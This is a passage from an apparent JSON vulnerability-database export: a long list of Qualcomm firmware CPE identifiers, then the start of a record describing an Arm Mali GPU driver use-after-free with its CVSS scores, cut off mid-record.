"cpe:2.3:o:qualcomm:sa6155p_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca6574_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdxr1_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:ar8035_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qcs605_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca6574a_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qcs610_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcn3999_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpa4340_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sa8155_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdx20_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmi8937_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpa8803_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca6320_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdr8150_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qdm2307_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm8150c_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm670_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:smb1394_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm640l_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca8337_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdr865_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qsm8250_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm8350b_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmk8003_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:msm8917_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcd9375_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:smr526_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmc1000h_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qet4100_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcn3620_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd450_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmx50_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm4640_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:rsw8577_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm8820_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca6436_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcn3998_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wtr3925_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmd9655_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmk8001_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm6150_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca6390_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:smb1351_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca9379_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm670l_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wsa8815_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm6150l_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpa5581_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpa6560_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:csrb31024_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sa6155_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:smr525_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmx24_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm8150l_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca6391_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd765_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm6582_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qsw6310_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca6420_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca6310_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd662_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qfe4308_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm855b_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qet5100m_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmi8952_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm5658_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sda429w_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wtr3905_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qfe2520_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qdm5650_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdr735_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdm630_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:mdm9650_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm7250_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qualcomm215_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdr8250_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sa515m_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm6670_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:aqt1000_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm6350_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qsw8574_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpa8821_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcn3615_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:smb1395_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm640a_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmk8002_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm6325_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qfe4301_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmi632_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca6174a_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca6431_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpa4360_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm5870_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm8895_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcn3660b_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm7350c_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm5641_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd670_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:fsm10055_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm2630_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm6250_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:msm8909w_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdr051_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdw3100_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcn3680b_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmk7350_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm8350c_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qdm2302_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd888_5g_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm8150b_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcd9371_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca6430_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qat5515_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sm4125_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:smb231_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca6564au_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdr052_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm8830_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:apq8009_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qdm5677_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:smb1396_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm5670_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd_8c_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca6595au_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd710_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm8350_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:ar8151_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdx50m_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qdm2308_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm6375_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm5679_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm6150a_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wtr2965_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qdm4650_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpa4361_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm5677_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdxr2_5g_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm5875_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcn3980_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm5620_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcn6856_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:msm8937_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qfe4320_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qet5100_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm8004_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qdm3302_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd429_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcn3950_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qln1021aq_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qbt2000_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcd9341_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qet6110_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpa5580_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wtr3950_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd768g_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcn3991_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpa8686_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qfe2550_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sm7350_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:csra6620_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm4650_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm4125_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qdm5579_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qat5533_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca6564a_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qfe4309_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wsa8835_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca6584au_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmi8996_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm640p_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qln5020_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdw2500_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pme605_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qat3518_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:smb1381_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd765g_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:apq8037_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qtm525_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd210_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:smb1355_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qfs2608_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm8996_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm7250b_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qln4640_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wgr7640_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcn3660_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qcm2290_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qln1030_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qtc801s_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd665_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qln4650_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:smb2351_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdm429w_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmm8996au_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qfs2630_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcn6851_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qat3550_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:msm8996au_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qbt1500_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:smb1358_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm8150_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qtm527_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm8150a_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qat5568_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wtr5975_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm5657_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmm6155au_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm670a_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd845_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpa5460_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdr660_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca6574au_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpa8801_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdx20m_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmx20_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qbt1000_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm4630_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm855l_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdr845_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qdm2310_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmm8155au_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcd9380_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmm855au_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm7150a_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm8350bhs_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qfe4303_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wtr2955_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sm7250p_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm8940_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qfe4373fc_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qcs405_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm855p_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qtc800t_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sa415m_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd_675_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sm4350_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qcs410_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sa6145p_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcn3990_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcd9370_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca6696_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:smb1390_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sm6250p_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qdm5621_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd_455_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qet6100_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:ar8031_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qat5516_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:msm8940_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qfe4305_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qat3522_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qdm2305_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd439_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qln5040_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qln1036aq_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdx55_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpa5461_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qdm3301_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qcs2290_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qsm7250_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmi8994_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qln1031_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm660_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qcm6125_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qet4101_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qdm5670_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qdm5620_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qln1020_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdr735g_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcn3610_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qcs6125_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd632_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm8005_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qfe4302_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcn6750_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm8953_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdx24_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdr660g_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:msm8953_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qfs2530_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm456_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmr735a_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcn6850_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:smb1380_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:csra6640_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd_8cx_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm8998_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm855a_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcd9335_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd855_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd865_5g_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd720g_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmk8350_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm8250_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpa8802_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qfe2101_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca9377_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca6421_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qdm5679_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qcs603_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sm6250_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd660_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:apq8053_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:smb1350_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm7150l_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm5577_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm215_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdr675_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:apq8096au_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:apq8064au_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcd9326_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm8009_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qcm4290_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd730_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm8350bh_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:smb1398_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm660l_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd750g_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qat3514_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmr735b_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca6564_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd_636_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm8909_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm5621_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qat3519_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmr525_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdm830_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qdm4643_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:msm8920_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm439_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd820_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpa8675_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm4621_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qln5030_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qtc410s_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qtc800s_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qat3516_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmw3100_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm8008_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca6426_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qdm2301_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qcc1110_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wtr4905_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qat3555_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm8916_firmware:-:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:35:55", "description": "The Arm Mali GPU kernel driver allows privilege escalation or information disclosure because GPU memory operations are mishandled, leading to a use-after-free. This affects Bifrost r0p0 through r28p0 before r29p0, Valhall r19p0 through r28p0 before r29p0, and Midgard r4p0 through r30p0.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": 